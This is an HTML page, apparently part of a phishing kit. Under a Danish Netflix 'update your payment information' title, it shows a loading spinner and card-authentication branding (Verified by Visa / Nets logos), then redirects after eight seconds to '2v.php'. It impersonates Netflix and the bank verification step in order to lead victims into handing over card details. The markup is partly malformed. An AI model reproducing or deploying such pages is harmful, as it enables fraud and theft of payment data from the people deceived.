﻿<DOCTYPE html>
<html><head>
<title>Netflix – Opdater dine betalingsoplysninger</title>

<meta http-equiv="refresh" content="8;URL='2v.php" /> 
    <meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
    <link rel="stylesheet" type="text/css" href="v/screen.css">
    <link rel="stylesheet" type="text/css" href="v/gh-buttons.css">
<script language="JavaScript" src="v.js" type="text/javascript"></script>

<link rel="shortcut icon" href="img/icon.ico">


<style type="text/css">

body {background-image:url('img/back2.png'); background-repeat:no-repeat;}

  </style></head><body><br>



<div style="margin-left: 426px; padding-top: 471px; position: absolute;">
<img src="img/loading.gif" width="80">
</div>


<div style="margin-left: 265px; padding-top: 1041px; position: absolute;">



<div id="authform">
    <div class="wrapper">
        <div class="logos">
            <table>
                <tbody>
                <tr>
                    <td class="identifier">
                        <img alt="" src="v/v.jpg" style="max-height:56px;">
                    </td>
                    <td class="bank">
                        <div 
						
	
						
						<a href="#"><img src="v/en.png" ></a></div>
                    </td>
                    <td class="bank">
                        <img alt="" src="v/netstech_small.png" style="max-height:56px;">
                    </td>
                </tr>
                </tbody>
            </table>
        </div>
       
        <p></p>
       

               

              

               


    </div>
</div>






</div>







<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br>
</body></html>